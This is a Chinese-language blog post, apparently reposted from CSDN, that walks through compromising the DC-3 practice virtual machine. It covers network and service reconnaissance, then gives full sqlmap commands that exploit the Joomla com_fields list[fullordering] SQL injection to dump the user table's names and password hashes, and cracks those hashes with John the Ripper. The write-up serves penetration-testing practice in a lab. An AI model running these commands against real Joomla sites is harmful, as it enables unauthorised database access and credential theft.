靶机入侵 DC-3

靶机入侵  DC3

渗透环境

kali Linux

DC-3  桥接同一网段

1.根据靶机mac地址寻找ip

KALI 自带的ARP侦查工具扫描

netdiscove   

2.nmap查看开放放口

nmap -O 10.3.139.67 -p-

3.使用whatweb对网站进行指纹识别 

whatweb http://10.3.139.67

查询到网站的CMS

4.joomscan 进行漏扫

joomscan --url http://10.3.139.67

4.使用searchsploit 进行本地漏洞在线查询

5.更改地址利用sqlmap进行查询注入点

--dbs列出数据库有哪些库名

sqlmap -u "http://10.3.139.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

6.确定web应用连接的是哪个数据库

sqlmap -u "http://10.3.139.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

7.指定数据库查询数据库中的表

sqlmap -u "http://10.3.139.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

8.查询#__users表中的字段

sqlmap -u "http://10.3.139.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

9.查询admin,password字段内容

sqlmap -u "http://10.3.139.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

10.john解密密文

使用kali的john是遇到的坑

当它解密之后无法再次解密该文件

解决:删除   .john/john.pot      文件下解密过的字符串

john /etc/joomla_v370.txt 

11.登录后台

猜你喜欢

转载自blog.csdn.net/qq_42094992/article/details/107589892
今日推荐